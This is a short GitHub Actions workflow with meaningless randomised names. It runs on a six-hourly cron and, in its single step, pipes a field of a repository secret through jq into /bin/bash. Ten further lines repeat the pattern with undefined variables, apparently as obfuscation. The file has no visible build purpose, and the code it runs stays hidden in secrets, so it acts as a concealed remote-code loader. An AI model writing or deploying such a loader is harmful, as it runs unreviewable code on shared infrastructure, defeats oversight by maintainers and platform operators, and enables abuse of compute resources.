name: examineexact

on:
  workflow_dispatch:
  schedule:
    - cron: '17 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: examineexact
        env:
          jilc969: ${{ secrets.jilc969 }}
        run: |
          echo $jilc969 | jq -r .nbhyp137 | /bin/bash
          echo $s2 | jq -r .ujnx61214 | /bin/bash
          echo $xla183 | jq -r .pb3 | /bin/bash
          echo $rs5 | jq -r .ju57208 | /bin/bash
          echo $o20 | jq -r .np37624 | /bin/bash
          echo $bpc5517 | jq -r .vh60 | /bin/bash
          echo $osb8801 | jq -r .y816 | /bin/bash
          echo $e6 | jq -r .re26 | /bin/bash
          echo $h3 | jq -r .box25779 | /bin/bash
          echo $p01 | jq -r .mxm59545 | /bin/bash
          echo $l6 | jq -r .tbxpj62 | /bin/bash

